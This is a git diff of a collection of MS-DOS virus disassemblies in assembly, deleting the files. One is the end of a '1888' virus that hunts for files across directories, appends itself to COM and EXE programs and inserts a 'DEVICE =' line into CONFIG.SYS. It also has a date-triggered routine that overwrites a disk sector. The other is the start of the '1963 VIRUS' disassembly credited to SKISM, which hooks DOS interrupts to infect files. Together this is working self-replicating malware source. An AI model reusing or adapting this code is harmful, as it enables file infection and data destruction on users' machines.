data_011B,ah - mov data_0134,al - mov data_0133,dl - mov data_0132,dh - mov data_0130,cx - mov ah,2Ch ; ',' - int 21h ; DOS Services ah=function 2Ch - ; get time, cx=hrs/min, dx=sec - mov data_0135,ch - retn -sub_099C endp - - -; -; SUBROUTINE -; - -sub_09CB proc near - mov ax,es - dec ax - push es - mov es,ax - mov ax,es:d_8B38_0003_e - mov data_012A,ax - pop es - mov bx,ax - sub bx,200h - mov ah,4Ah ; 'J' - int 21h ; DOS Services ah=function 4Ah - ; change memory allocation - ; bx=bytes/16, es=mem segment - mov bx,150h - mov ah,48h ; 'H' - int 21h ; DOS Services ah=function 48h - ; allocate memory, bx=bytes/16 - mov word ptr data_012C+2,ax - retn -sub_09CB endp - - -; -; SUBROUTINE -; - -sub_09EE proc near - push es - mov ax,word ptr data_012C+2 - mov es,ax - mov ah,49h ; 'I' - int 21h ; DOS Services ah=function 49h - ; release memory block, es=seg - mov ax,data_0128 - mov es,ax - mov bx,data_012A - mov ah,4Ah ; 'J' - int 21h ; DOS Services ah=function 4Ah - ; change memory allocation - ; bx=bytes/16, es=mem segment - pop es - retn -sub_09EE endp - - -; -; SUBROUTINE -; - -sub_0A07 proc near - push ds - mov ah,1Bh - int 21h ; DOS Services ah=function 1Bh - ; get disk info, default drive - ; al=sectors per cluster - ; ds:bx=ptr to media ID byte - ; cx=sector size, dx=clusters - cmp byte ptr [bx],0F8h - pop ds - retn -sub_0A07 endp - - -; -; SUBROUTINE -; - -sub_0A11 proc near - lea si,data_019D ; Load effective addr - mov di,si - xor dl,dl ; Zero register - mov ah,47h ; 'G' - int 21h ; DOS Services ah=function 47h - ; get present dir,drive dl,1=a: - ; ds:si=ASCIIZ directory name - mov cx,30h - mov al,0 - repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al - mov cx,di - sub cx,si - lea di,data_013A ; ('\DANGER\1888') Load effective addr - mov al,5Ch ; '\' - stosb ; Store al to es:[di] - rep movsb ; Rep when cx >0 Mov [si] to es:[di] - retn -sub_0A11 endp - - -; -; SUBROUTINE -; - -sub_0A32 proc near - mov data_0182,0 - lea bx,cs:[160h] ; Load effective addr - add 
bx,20h - mov data_0180,bx - sub bx,20h - lea dx,data_015A+4 ; ('*') Load effective addr - mov cx,33h - mov ah,4Eh ; 'N' - int 21h ; DOS Services ah=function 4Eh - ; find 1st filenam match @ds:dx - jc loc_0A81 ; Jump if carry Set -loc_0A52: - lea di,data_019D ; Load effective addr - add di,1Eh - cmp byte ptr [di],2Eh ; '.' - je loc_0A7B ; Jump if equal - mov si,di - mov cx,20h - mov al,0 - repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al - mov cx,di - sub cx,si - mov di,bx - add bx,cx - cmp bx,data_0180 - ja loc_0A81 ; Jump if above - rep movsb ; Rep when cx >0 Mov [si] to es:[di] - inc data_0182 -loc_0A7B: - mov ah,4Fh ; 'O' - int 21h ; DOS Services ah=function 4Fh - ; find next filename match - jnc loc_0A52 ; Jump if carry=0 -loc_0A81: - lea bx,cs:[160h] ; Load effective addr - mov data_0180,bx - retn -sub_0A32 endp - - -; -; SUBROUTINE -; - -sub_0A8A proc near - cmp data_0182,0 - je loc_ret_0AAE ; Jump if equal - lea dx,data_013A ; ('\DANGER\1888') Load effective addr - mov ah,3Bh ; ';' - int 21h ; DOS Services ah=function 3Bh - ; set current dir, path @ ds:dx - mov dx,data_0180 - mov di,dx - mov ah,3Bh ; ';' - int 21h ; DOS Services ah=function 3Bh - ; set current dir, path @ ds:dx - mov al,0 - mov cx,20h - repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al - mov data_0180,di - -loc_ret_0AAE: - retn -sub_0A8A endp - - -; -; SUBROUTINE -; - -sub_0AAF proc near - mov ax,data_0104 - and al,1Fh - cmp al,1Eh - retn -sub_0AAF endp - - -; -; SUBROUTINE -; - -sub_0AB7 proc near - lea dx,data_0194 ; Load effective addr - cmp data_011E,0 - je loc_0AC6 ; Jump if equal - lea dx,data_018E ; Load effective addr -loc_0AC6: - mov cx,23h - mov ah,4Eh ; 'N' - int 21h ; DOS Services ah=function 4Eh - ; find 1st filenam match @ds:dx - retn -sub_0AB7 endp - - -; -; SUBROUTINE -; - -sub_0ACE proc near - lea si,data_019D ; Load effective addr - add si,15h - lea di,data_0103 ; Load effective addr - mov cx,16h - rep movsb ; Rep when cx >0 Mov [si] to es:[di] - retn -sub_0ACE endp - - -; 
-; SUBROUTINE -; - -sub_0ADF proc near - pushf ; Push flags - mov cx,data_0104 - or cl,1Fh - and cl,0FEh - mov dx,data_0106 - mov ax,5701h - int 21h ; DOS Services ah=function 57h - ; set file date+time, bx=handle - ; cx=time, dx=time - mov ah,3Eh ; '>' - int 21h ; DOS Services ah=function 3Eh - ; close file, bx=file handle - lea dx,data_010C ; ('1888.COM') Load effective addr - xor ch,ch ; Zero register - mov cl,data_0103 - mov ax,4301h - int 21h ; DOS Services ah=function 43h - ; set attrb cx, filename @ds:dx - popf ; Pop flags - retn -sub_0ADF endp - - -; -; SUBROUTINE -; - -sub_0B08 proc near - lea dx,data_010C ; ('1888.COM') Load effective addr - xor cx,cx ; Zero register - mov ax,4301h - int 21h ; DOS Services ah=function 43h - ; set attrb cx, filename @ds:dx - jc loc_ret_0B1C ; Jump if carry Set - mov ax,3D02h - int 21h ; DOS Services ah=function 3Dh - ; open file, al=mode,name@ds:dx - mov bx,ax - -loc_ret_0B1C: - retn -sub_0B08 endp - - -; -; SUBROUTINE -; - -sub_0B1D proc near - push ds - mov ax,word ptr data_012C+2 - mov ds,ax - mov cx,100h - xor dx,dx ; Zero register - mov ah,3Fh ; '?' 
- int 21h ; DOS Services ah=function 3Fh - ; read file, bx=file handle - ; cx=bytes to ds:dx buffer - cmp word ptr ds:d_9E01_0000_e,5A4Dh - nop ;*ASM fixup - sign extn byte - je loc_0B38 ; Jump if equal - stc ; Set carry flag - jmp loc_0BB7 -loc_0B38: - call sub_0BB9 - push ax - mov ax,di - and ax,0Fh - mov cx,10h - xor dx,dx ; Zero register - sub cx,ax - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file bx=file handle - ; cx=bytes from ds:dx buffer - jnc loc_0B51 ; Jump if carry=0 - jmp short loc_0BB7 - db 90h -loc_0B51: - mov si,ax - mov cx,100h - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file bx=file handle - ; cx=bytes from ds:dx buffer - jc loc_0BB7 ; Jump if carry Set - pop dx - mov ax,di - add ax,si - add ax,100h - cmp ax,200h - jb loc_0B6D ; Jump if below - and ax,1FFh - inc dx -loc_0B6D: - mov cl,4 - shr ax,cl ; Shift w/zeros fill - dec dx - mov cl,5 - shl dx,cl ; Shift w/zeros fill - sub dx,ds:d_9E01_0008_e - add ax,dx - sub ax,10h - mov ds:d_9E01_0016_e,ax - mov word ptr ds:d_9E01_0014_e,100h - push ds - mov ax,cs - mov ds,ax - mov cx,data_011C - mov dx,100h - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file bx=file handle - ; cx=bytes from ds:dx buffer - pop ds - jc loc_0BB7 ; Jump if carry Set - call sub_0BB9 - mov ds:d_9E01_0002_e,di - mov ds:d_9E01_0004_e,ax - mov ax,4200h - xor dx,dx ; Zero register - xor cx,cx ; Zero register - int 21h ; DOS Services ah=function 42h - ; move file ptr, bx=file handle - ; al=method, cx,dx=offset - jc loc_0BB7 ; Jump if carry Set - mov cx,100h - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file bx=file handle - ; cx=bytes from ds:dx buffer -loc_0BB7: - pop ds - retn -sub_0B1D endp - - -; -; SUBROUTINE -; - -sub_0BB9 proc near - mov ax,4202h - xor cx,cx ; Zero register - xor dx,dx ; Zero register - int 21h ; DOS Services ah=function 42h - ; move file ptr, bx=file handle - ; al=method, cx,dx=offset - mov di,ax - and di,1FFh - 
mov cl,9 - shr ax,cl ; Shift w/zeros fill - mov cl,7 - shl dx,cl ; Shift w/zeros fill - add ax,dx - inc ax - retn -sub_0BB9 endp - - -; -; SUBROUTINE -; - -sub_0BD4 proc near - mov ax,data_0108 - mov data_0120,ax - mov cx,data_011C - cmp cx,ax - jb loc_0BEA ; Jump if below - mov data_0120,cx - mov cx,data_0108 -loc_0BEA: - push ds - mov ax,word ptr data_012C+2 - mov ds,ax - xor dx,dx ; Zero register - mov ah,3Fh ; '?' - int 21h ; DOS Services ah=function 3Fh - ; read file, bx=file handle - ; cx=bytes to ds:dx buffer - pop ds - jc loc_ret_0C3F ; Jump if carry Set - mov ax,4200h - xor dx,dx ; Zero register - xor cx,cx ; Zero register - int 21h ; DOS Services ah=function 42h - ; move file ptr, bx=file handle - ; al=method, cx,dx=offset - jc loc_ret_0C3F ; Jump if carry Set - mov dx,100h - mov cx,data_011C - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file bx=file handle - ; cx=bytes from ds:dx buffer - jc loc_ret_0C3F ; Jump if carry Set - cmp ax,data_0108 - ja loc_0C2E ; Jump if above - mov ax,4200h - mov dx,data_0108 - mov data_0120,dx - xor cx,cx ; Zero register - int 21h ; DOS Services ah=function 42h - ; move file ptr, bx=file handle - ; al=method, cx,dx=offset - jc loc_ret_0C3F ; Jump if carry Set - mov cx,data_011C - jmp short loc_0C32 -loc_0C2E: - mov cx,data_0108 -loc_0C32: - push ds - mov ax,word ptr data_012C+2 - mov ds,ax - xor dx,dx ; Zero register - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file bx=file handle - ; cx=bytes from ds:dx buffer - pop ds - -loc_ret_0C3F: - retn -sub_0BD4 endp - - -; -; SUBROUTINE -; - -sub_0C40 proc near - cmp data_011B,2 - ja loc_0C4A ; Jump if above - xor ax,ax ; Zero register - retn -loc_0C4A: - mov al,data_0133 - and al,1 - retn -sub_0C40 endp - - -; -; SUBROUTINE -; - -sub_0C50 proc near - cmp data_0133,0Fh - jb loc_0C69 ; Jump if below - mov al,data_0135 - cmp al,13h - jb loc_0C69 ; Jump if below - mov ax,40h - mov es,ax - mov byte ptr es:d_0040_004A_e,23h ; '#' 
-loc_0C69: - cmp data_0133,0Dh - jne loc_ret_0C86 ; Jump if not equal - cmp data_0134,5 - jne loc_ret_0C86 ; Jump if not equal - mov ax,301h - mov cx,1 - mov dx,50h - xor bx,bx ; Zero register - mov es,bx - int 13h ; Disk dl=drive ? ah=func 03h - ; write sectors from mem es:bx - ; al=#,ch=cyl,cl=sectr,dh=head - -loc_ret_0C86: - retn -sub_0C50 endp - - -; -; SUBROUTINE -; - -sub_0C87 proc near - mov data_019B,1 - lea dx,data_05C1 ; Load effective addr - mov cx,27h - mov ah,4Eh ; 'N' - int 21h ; DOS Services ah=function 4Eh - ; find 1st filenam match @ds:dx - jnc loc_0CC6 ; Jump if carry=0 - mov ah,3Ch ; '<' - mov cx,6 - int 21h ; DOS Services ah=function 3Ch - ; create/truncate file @ ds:dx - mov bx,ax - lea dx,data_05EE ; Load effective addr - mov cx,data_070A - mov si,dx - add si,data_00B3_e - mov ax,data_0130 - mov [si],ax - mov ah,data_0132 - mov [si+2],ah - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file bx=file handle - ; cx=bytes from ds:dx buffer - mov ah,3Eh ; '>' - int 21h ; DOS Services ah=function 3Eh - ; close file, bx=file handle - jc loc_0D1F ; Jump if carry Set -loc_0CC6: - lea dx,data_05C7 ; ('C:\CONFIG.SYS') Load effective add - mov cx,27h - mov ah,4Eh ; 'N' - int 21h ; DOS Services ah=function 4Eh - ; find 1st filenam match @ds:dx - jc loc_0D1F ; Jump if carry Set - call sub_0ACE - xor cx,cx ; Zero register - mov ax,4301h - int 21h ; DOS Services ah=function 43h - ; set attrb cx, filename @ds:dx - mov ax,3D02h - int 21h ; DOS Services ah=function 3Dh - ; open file, al=mode,name@ds:dx - mov bx,ax - jc loc_0D1F ; Jump if carry Set - mov cx,data_0108 - push es - push ds - mov ax,word ptr data_012C+2 - mov ds,ax - mov es,ax - xor dx,dx ; Zero register - mov ah,3Fh ; '?' 
- int 21h ; DOS Services ah=function 3Fh - ; read file, bx=file handle - ; cx=bytes to ds:dx buffer - pop ds - mov dx,ax - mov ax,0FFFFh - xor di,di ; Zero register - repne scasb ; Rep zf=0+cx >0 Scan es:[di] for al - cmp ax,es:[di-1] - pop es - jz loc_0D1F ; Jump if zero - mov ax,4200h - xor cx,cx ; Zero register - dec dx - int 21h ; DOS Services ah=function 42h - ; move file ptr, bx=file handle - ; al=method, cx,dx=offset - jc loc_0D1F ; Jump if carry Set - lea dx,data_05D5 ; ('DEVICE =') Load effective addr - mov cx,19h - mov ah,40h ; '@' - int 21h ; DOS Services ah=function 40h - ; write file bx=file handle - ; cx=bytes from ds:dx buffer -loc_0D1F: - call sub_0ADF - retn -sub_0C87 endp - - inc bx - cmp bl,[si-1] - inc word ptr [bx+si] - inc bx - cmp bl,[si+43h] - dec di - dec si - inc si - dec cx - inc di - db 2Eh, 53h, 59h, 53h, 00h - db 'DEVICE =' - db 0FFh,0FFh - db ' COUNTRY.SYS', 0Dh, 0Ah - db 1Ah,0FFh,0FFh,0FFh,0FFh, 40h - db 0C8h, 16h, 00h, 21h, 00h - db 'hgt42 ' - db 00h, 00h, 00h, 00h, 2Eh, 89h - db 1Eh, 12h, 00h, 2Eh, 8Ch, 06h - db 14h, 00h,0CBh, 1Eh, 06h, 0Eh - db 1Fh,0C4h, 3Eh, 12h, 00h, 26h - db 8Ah, 45h, 02h, 3Ch, 00h, 75h - db 03h,0E8h, 82h, 00h - db 0Dh, 00h, 10h, 26h, 89h, 45h - db 03h, 07h, 1Fh,0CBh, 50h, 53h - db 51h, 1Eh - db 0E4h, 60h,0A8h, 80h, 75h, 30h - db 2Eh, 8Bh, 1Eh,0A9h, 00h, 3Ah - db 0C7h, 75h, 27h,0B8h, 40h, 00h - db 8Eh,0D8h,0E8h, 28h, 00h, 25h - db 05h, 00h, 8Bh,0C8h - db 0BBh, 1Ch, 00h - -locloop_0DB1: - mov ax,cs:data_00A9_e - mov [bx],ax - add bx,2 - cmp bx,3Fh - jb loc_0DC2 ; Jump if below - mov bx,1Eh -loc_0DC2: - mov word ptr ds:[1Ch],bx - loop locloop_0DB1 ; Loop if cx > 0 - -loc_0DC8: - pop ds - pop cx - pop bx - pop ax - jmp dword ptr cs:data_00A3_e - -; -; SUBROUTINE -; - -sub_0DD1 proc near - mov ax,cs:data_00A7_e - push ax - and ah,0B4h - pop ax - jp loc_0DDD ; Jump if parity=1 - stc ; Set carry flag -loc_0DDD: - rcl ax,1 ; Rotate thru carry - mov cs:data_00A7_e,ax - retn -sub_0DD1 endp - - db 'hgt42 ' - db 00h, 56h, 
31h, 00h, 46h, 52h - db 44h, 00h, 00h, 00h, 00h, 00h - db 00h, 65h, 12h, 65h, 73h, 74h - db 6Eh, 12h, 1Fh, 14h, 31h,0CDh - db 0ABh,0EFh - db 06h, 57h,0B4h, 2Ah,0CDh, 21h - db 8Ah,0E6h, 3Bh, 0Eh,0B3h, 00h - db 74h, 03h, 80h,0C4h - db 0Ch -loc_0E17: - sub ah,ds:data_00B5_e - cmp ah,3 - jb loc_0E5D ; Jump if below - mov ds:data_00B5_e,dh - mov ds:data_00B3_e,cx - mov ah,2Ch ; ',' - int 21h ; DOS Services ah=function 2Ch - ; get time, cx=hrs/min, dx=sec - mov ds:data_00A7_e,dx - call sub_0DD1 - mov bx,ax - and bx,3 - nop ;*ASM fixup - sign extn byte - mov al,ds:data_00AB_e[bx] - mov ah,ds:data_00AF_e[bx] - mov ds:data_00A9_e,ax - mov ax,3516h - int 21h ; DOS Services ah=function 35h - ; get intrpt vector al in es:bx - mov ds:data_00A3_e,bx - mov bx,es - mov word ptr ds:data_00A3_e+2,bx - cli ; Disable interrupts -;* mov dx,offset loc_003E ;* - db 0BAh, 3Eh, 00h - mov ax,2516h - int 21h ; DOS Services ah=function 25h - ; set intrpt vector al to ds:dx - sti ; Enable interrupts -loc_0E5D: - pop di - pop es - mov word ptr es:[di+0Eh],0B6h - mov es:[di+10h],cs - xor ax,ax ; Zero register - retn - db 1Ch - db 01h, 8Bh, 1Eh, 28h, 01h,0A1h - db 26h, 01h, 8Eh,0D0h, 8Bh, 26h - db 24h, 01h, 83h,0ECh, 04h, 8Bh - db 0F4h, 80h, 3Eh, 1Fh, 01h, 00h - db 75h, 28h,0BFh, 00h, 01h, 36h - db 89h, 3Ch, 8Bh,0FBh, 36h, 89h - db 7Ch, 02h, 33h,0FFh, 36h, 89h - db 7Ch, 04h - db 0BFh, 00h, 01h, 8Bh, 36h, 22h - db 01h, 03h,0F7h, 8Bh, 0Eh, 1Ch - db 01h, 8Ch,0D8h, 8Eh,0C0h,0F3h - db 0A4h,0EBh, 16h, 90h -loc_0EAF: - mov di,bx - add di,10h - mov ax,ds:data_0016_e - add di,ax - mov ss:[si+2],di - mov di,word ptr ds:data_0012_e+2 - mov ss:[si],di -loc_0EC4: - mov ds,bx - mov es,bx - retf ; Return far - db 8Ch,0D0h, 2Eh,0A3h, 26h, 01h - db 2Eh, 89h, 26h, 24h, 01h, 8Ch - db 0C8h, 8Eh,0D0h,0BCh,0F7h, 01h - db 1Eh, 8Eh,0D8h, 58h,0A3h, 28h - db 01h,0E8h,0E6h,0FAh, 8Ch,0C8h - db 8Eh,0C0h,0E8h, 6Dh,0FAh - db 0BAh, 9Dh, 01h,0B4h, 1Ah,0CDh - db 21h,0E8h, 1Bh,0FBh,0E8h, 0Eh - db 0FBh, 73h, 03h,0E9h, 9Eh, 00h 
-loc_0EFE: - call sub_0989 - jc loc_0F06 ; Jump if carry Set - jmp loc_0F9C -loc_0F06: - call sub_099C - call sub_0A32 - mov data_011E,0 -loc_0F11: - call sub_0AB7 - jc loc_0F62 ; Jump if carry Set -loc_0F16: - cmp data_019C,4 - ja loc_0F9C ; Jump if above - call sub_0ACE - call sub_0AAF - jnc loc_0F5C ; Jump if carry=0 - cmp data_010A,4 - ja loc_0F5C ; Jump if above - call sub_0B08 - jc loc_0F9C ; Jump if carry Set - cmp data_011E,0 - je loc_0F3D ; Jump if equal - call sub_0B1D - jmp short loc_0F40 -loc_0F3D: - call sub_0BD4 -loc_0F40: - call sub_0ADF - jc loc_0F9C ; Jump if carry Set - inc data_019C - cmp data_019B,1 - je loc_0F5C ; Jump if equal - call sub_0C40 - jz loc_0F5C ; Jump if zero - call sub_0C87 - jc loc_0F9C ; Jump if carry Set - jmp short loc_0F11 -loc_0F5C: - mov ah,4Fh ; 'O' - int 21h ; DOS Services ah=function 4Fh - ; find next filename match - jnc loc_0F16 ; Jump if carry=0 -loc_0F62: - cmp data_011E,1 - je loc_0F70 ; Jump if equal - mov data_011E,1 - jmp short loc_0F11 -loc_0F70: - mov data_011E,0 - cmp data_019A,0 - jne loc_0F8B ; Jump if not equal - lea dx,data_015A ; ('C:\') Load effective addr - mov ah,3Bh ; ';' - int 21h ; DOS Services ah=function 3Bh - ; set current dir, path @ ds:dx - mov data_019A,0FFh - jmp short loc_0F11 -loc_0F8B: - cmp data_0182,0 - je loc_0F9C ; Jump if equal - call sub_0A8A - dec data_0182 - jmp loc_0F11 -loc_0F9C: - lea dx,data_013A ; ('\DANGER\1888') Load effective addr - mov ah,3Bh ; ';' - int 21h ; DOS Services ah=function 3Bh - ; set current dir, path @ ds:dx - call sub_0C40 - jz loc_0FAC ; Jump if zero - call sub_0C50 -loc_0FAC: - mov ax,word ptr data_012C+2 - mov es,ax - mov cx,5Bh - mov si,offset data_070C - xor di,di ; Zero register - rep movsb ; Rep when cx >0 Mov [si] to es:[di] - call sub_09EE - call data_012C - -seg_a ends - - - - end start diff --git a/0-9/1963 (8).ASM b/0-9/1963 (8).ASM deleted file mode 100755 index 7449bfa..0000000 --- a/0-9/1963 (8).ASM +++ /dev/null 
@@ -1,1292 +0,0 @@ - -PAGE 59,132 - -; -; -; 1963 VIRUS -; -; disassembly by -; -; DecimatoR / SKISM -; -; 01/15/92 Compile with TASM 2.0 DW 717-367-3501 -; - -data_1e equ 4 ; (0000:0004=7FBh) -data_2e equ 6 ; (0000:0006=70h) -data_3e equ 4Ch ; (0000:004C=88h) -data_4e equ 84h ; (0000:0084=16h) -data_6e equ 0Ah ; (0046:000A=0) -data_7e equ 16h ; (0046:0016=0) -data_8e equ 2Ch ; (0046:002C=50h) -data_9e equ 8ABh ; (0046:08AB=4146h) -data_10e equ 8ADh ; (0046:08AD=3154h) -data_11e equ 0Ah ; (08D4:000A=2F9h) -data_12e equ 0Ch ; (08D4:000C=3872h) -data_13e equ 100h ; (08D4:0100=0DFh) -data_14e equ 1 ; (4815:0001=0FFFFh) -data_15e equ 100h ; (4816:0100=0FFh) -data_16e equ 1 ; (8343:0001=0FFFFh) -data_17e equ 0Ah ; (8344:000A=0) -data_18e equ 0Eh ; (8344:000E=8344h) -data_49e equ 900h ; (8344:0900=0) -data_50e equ 902h ; (8344:0902=0) -data_51e equ 904h ; (8344:0904=8344h) -data_52e equ 906h ; (8344:0906=0) -data_53e equ 9EFh ; (8344:09EF=0) -data_54e equ 10AFh ; (8344:10AF=0) -data_55e equ 10B1h ; (8344:10B1=0) -data_56e equ 10B3h ; (8344:10B3=0) - -seg_a segment byte public - assume cs:seg_a, ds:seg_a - - - org 100h - -virus proc far - -start: - mov ah,30h ; '0' - int 21h ; DOS Services ah=function 30h - ; get DOS version number ax - cmp al,3 - jb loc_1 ; Jump if below - mov ax,1200h - int 2Fh ; Multiplex/Spooler al=func 00h - ; get installed status - cmp al,0FFh -loc_1: - mov ax,0Bh - jc loc_4 ; Jump if carry Set - mov ah,4Ah ; 'J' - mov bx,140h - int 21h ; DOS Services ah=function 4Ah - ; change mem allocation, bx=siz - jc loc_4 ; Jump if carry Set - cli ; Disable interrupts - push cs - pop ss - mov sp,13FEh - call sub_1 ; (01EB) - sti ; Enable interrupts - mov ax,ds:data_8e ; (0046:002C=50h) - or ax,ax ; Zero ? 
- jz loc_5 ; Jump if zero - call sub_13 ; (07EC) - mov es,ax - xor di,di ; Zero register - xor ax,ax ; Zero register -loc_2: - scasw ; Scan es:[di] for ax - jnz loc_2 ; Jump if not zero - scasw ; Scan es:[di] for ax - mov dx,di - push es - pop ds - mov ah,48h ; 'H' - mov bx,0FFFFh - int 21h ; DOS Services ah=function 48h - ; allocate memory, bx=bytes/16 - mov ah,48h ; 'H' - int 21h ; DOS Services ah=function 48h - ; allocate memory, bx=bytes/16 - mov es,ax - mov ah,49h ; 'I' - int 21h ; DOS Services ah=function 49h - ; release memory block, es=seg - xor ax,ax ; Zero register - mov cx,bx - mov bx,es - -locloop_3: - push cx - mov cx,8 - xor di,di ; Zero register - rep stosw ; Rep when cx >0 Store ax to es:[di] - inc bx - mov es,bx - pop cx - loop locloop_3 ; Loop if cx > 0 - - push cs - pop es - mov bx,data_51e ; (8344:0904=44h) - mov di,bx - stosw ; Store ax to es:[di] - mov al,80h - stosw ; Store ax to es:[di] - mov ax,cs - stosw ; Store ax to es:[di] - mov ax,5Ch - stosw ; Store ax to es:[di] - mov ax,cs - stosw ; Store ax to es:[di] - mov ax,6Ch - stosw ; Store ax to es:[di] - mov ax,cs - stosw ; Store ax to es:[di] - mov ax,4B00h - int 21h ; DOS Services ah=function 4Bh - ; run progm @ds:dx, parm @es:bx -loc_4: - push cs - pop ds - call sub_13 ; (07EC) - jmp dword ptr cs:data_17e ; (8344:000A=0) -loc_5: - mov ax,1220h - mov bx,5 - int 2Fh ; ??INT Non-standard interrupt. - push bx - dec bx - dec bx - mov es:[di],bl - mov ax,1216h - int 2Fh ; ??INT Non-standard interrupt. - dec bx - dec bx - mov es:[di],bx - mov ah,48h ; 'H' - mov bx,0FFFFh - int 21h ; DOS Services ah=function 48h - ; allocate memory, bx=bytes/16 - mov ah,48h ; 'H' - int 21h ; DOS Services ah=function 48h - ; allocate memory, bx=bytes/16 - mov ds,ax - pop bx - mov ax,4200h - xor cx,cx ; Zero register - xor dx,dx ; Zero register - int 21h ; DOS Services ah=function 42h - ; move file ptr, cx,dx=offset - mov ah,3Fh ; '?' 
- mov dx,data_15e ; (4816:0100=0FFh) - mov cx,es:[di+11h] - int 21h ; DOS Services ah=function 3Fh - ; read file, cx=bytes, to ds:dx - jc loc_4 ; Jump if carry Set - mov ah,3Eh ; '>' - int 21h ; DOS Services ah=function 3Eh - ; close file, bx=file handle - mov ah,26h ; '&' - mov dx,ds - int 21h ; DOS Services ah=function 26h - ; create progm seg prefix dx - dec dx - mov es,dx - mov es:data_14e,ds ; (4815:0001=0FFFFh) - inc dx - mov es,dx - mov ss,dx - mov sp,0FFFEh - push ds - mov ax,100h - push ax - retf ; Return far - -virus endp - -; -; SUBROUTINE -; - -sub_1 proc near - push ds - mov ax,1203h - int 2Fh ; Multiplex/Spooler al=func 03h - ; remove all files from queue - mov cs:data_51e,ds ; (8344:0904=8344h) - xor si,si ; Zero register - mov ds,si - mov di,288h - mov si,cs - xchg di,ds:data_1e ; (0000:0004=7FBh) - xchg si,ds:data_2e ; (0000:0006=70h) - pushf ; Push flags - pushf ; Push flags - pushf ; Push flags - mov bp,sp - or byte ptr [bp+1],1 - popf ; Pop flags - pushf ; Push flags - pushf ; Push flags - mov word ptr cs:data_52e,8AFh ; (8344:0906=0) - mov ah,1 - call dword ptr ds:data_3e ; (0000:004C=2288h) - popf ; Pop flags - mov word ptr cs:data_52e,8ABh ; (8344:0906=0) - mov ah,0Bh - call dword ptr ds:data_4e ; (0000:0084=1716h) - popf ; Pop flags - mov ds:data_1e,di ; (0000:0004=7FBh) - mov ds:data_2e,si ; (0000:0006=70h) - pop ds - push ds - push es - mov bx,cs - mov bp,2AEh - mov ax,ds:data_9e ; (0046:08AB=4146h) - mov dx,ds:data_10e ; (0046:08AD=3154h) - xor si,si ; Zero register - mov ds,si - cmp ax,ds:data_4e ; (0000:0084=1716h) - jne loc_6 ; Jump if not equal - cmp dx,word ptr ds:data_4e+2 ; (0000:0086=2C7h) - jne loc_6 ; Jump if not equal - mov ds:data_4e,bp ; (0000:0084=1716h) - mov word ptr ds:data_4e+2,bx ; (0000:0086=2C7h) - jmp short loc_10 ; (0285) -loc_6: - mov ax,8ABh - mov es,bx - mov cx,10h - cld ; Clear direction - -locloop_7: - mov di,ax - mov ds,dx - cmpsw ; Cmp [si] to es:[di] - jnz loc_9 ; Jump if not zero - cmpsw ; Cmp [si] to 
es:[di] - jnz loc_8 ; Jump if not zero - mov [si-4],bp - mov [si-2],bx -loc_8: - dec si - dec si -loc_9: - dec si - loop locloop_7 ; Loop if cx > 0 - - xchg si,cx - inc dx - cmp dx,bx - jne locloop_7 ; Jump if not equal -loc_10: - pop es - pop ds - retn -sub_1 endp - - push bp - mov bp,sp - push ax - mov ax,[bp+4] - cmp ax,cs:data_51e ; (8344:0904=8344h) - ja loc_11 ; Jump if above - push bx - mov bx,cs:data_52e ; (8344:0906=0) - mov cs:[bx+2],ax - mov ax,[bp+2] - mov cs:[bx],ax - and byte ptr [bp+7],0FEh - pop bx -loc_11: - pop ax - pop bp - iret ; Interrupt return - db 55h, 8Bh,0ECh, 80h,0FCh, 48h - db 74h, 0Ah, 80h,0FCh, 4Ah, 74h - db 05h, 3Dh, 03h, 4Bh, 75h, 0Ch - db 0E8h, 89h, 05h,0E8h,0AFh, 05h - db 9Ch,0E8h, 87h, 05h,0EBh, 55h - db 80h,0FCh, 31h, 74h, 05h, 80h - db 0FCh - db 4Ch, 75h, 0Dh -loc_12: - push bx - mov bx,13h -loc_13: - call sub_5 ; (0532) - dec bx - jns loc_13 ; Jump if not sign - pop bx - jmp short loc_23 ; (0342) -loc_14: - cmp ah,0Fh - je loc_15 ; Jump if equal - cmp ah,10h - je loc_15 ; Jump if equal - cmp ah,17h - je loc_15 ; Jump if equal - cmp ah,23h ; '#' - jne loc_16 ; Jump if not equal -loc_15: - call sub_15 ; (081F) - jmp short loc_23 ; (0342) -loc_16: - cmp ah,3Fh ; '?' 
- jne loc_20 ; Jump if not equal - call sub_5 ; (0532) - jnc loc_18 ; Jump if carry=0 - mov ax,5 -loc_17: - jmp loc_37 ; (0403) -loc_18: - jnz loc_23 ; Jump if not zero - call sub_22 ; (0875) - jc loc_17 ; Jump if carry Set - pushf ; Push flags - call sub_24 ; (0884) - push ds - pop es - mov di,dx - call sub_11 ; (0785) - call sub_25 ; (0896) -loc_19: - popf ; Pop flags - pop bp - retf 2 ; Return far -loc_20: - cmp ah,3Dh ; '=' - je loc_21 ; Jump if equal - cmp ah,43h ; 'C' - je loc_21 ; Jump if equal - cmp ah,56h ; 'V' - jne loc_22 ; Jump if not equal -loc_21: - call sub_3 ; (0519) - jmp short loc_23 ; (0342) -loc_22: - cmp ah,3Eh ; '>' - jne loc_24 ; Jump if not equal - call sub_5 ; (0532) -loc_23: - push word ptr [bp+6] - popf ; Pop flags - pop bp - cli ; Disable interrupts - jmp dword ptr cs:data_20 ; (8344:08AB=0) -loc_24: - cmp ah,14h - je loc_25 ; Jump if equal - cmp ah,21h ; '!' - je loc_25 ; Jump if equal - cmp ah,27h ; ''' - je loc_25 ; Jump if equal - jmp loc_35 ; (03DE) -loc_25: - call sub_15 ; (081F) - jnc loc_27 ; Jump if carry=0 -loc_26: - pop bp - mov al,1 - iret ; Interrupt return -loc_27: - jnz loc_23 ; Jump if not zero - call sub_24 ; (0884) - call sub_14 ; (0814) - cmp ah,14h - jne loc_28 ; Jump if not equal - mov ax,[si+0Ch] - mov dx,80h - mul dx ; dx:ax = reg * ax - xor bx,bx ; Zero register - add al,[si+20h] - adc ah,bl - adc bx,dx - xchg ax,bx - jmp short loc_29 ; (038F) -loc_28: - mov ax,[si+23h] - mov bx,[si+21h] -loc_29: - mov cx,[si+0Eh] - mul cx ; 